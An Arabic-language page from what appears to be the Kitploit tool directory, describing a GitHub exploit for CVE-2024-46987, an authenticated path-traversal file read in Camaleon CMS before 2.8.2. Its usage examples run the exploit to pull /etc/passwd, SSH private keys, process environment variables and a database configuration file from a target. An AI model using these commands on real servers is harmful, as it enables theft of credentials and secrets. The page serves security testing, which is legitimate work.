Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI استغلال | Kitploit
أدوات/GitHubGitHub/rival420/cve-2024-46987
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI استغلال

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-46987 - تضمين الملفات المحلي في Camaleon CMS

استغلال تضمين الملفات المحلي (LFI) الموثّق لـ Camaleon CMS.

الثغرة الأمنية

Camaleon CMS معرض لهجوم LFI موثّق عبر نقطة النهاية /admin/media/download_private_file. لا يتم تعقيم معامل file بشكل صحيح، مما يسمح بتجاوز المسار لقراءة أي ملفات من الخادم.

الإصدارات المتأثرة

  • Camaleon CMS < 2.8.2

المتطلبات

root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

المعاملات

أمثلة

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

إخلاء مسؤولية

هذه الأداة مخصصة لاختبار الأمان المصرح به ولأغراض تعليمية فقط. استخدمها فقط ضد الأنظمة التي لديك إذن صريح لاختبارها.

المراجع

  • CVE-2024-46987
  • Camaleon CMS
تنزيل الأداة
المعاملالوصف
-u, --urlعنوان URL الهدف
-f, --fileالملف المراد قراءته (مثال: /etc/passwd)
-t, --tokenقيمة الكوكي auth_token
-o, --outputاسم ملف الإخراج (اختياري، يطبع في الطرفية إذا لم يُحدد)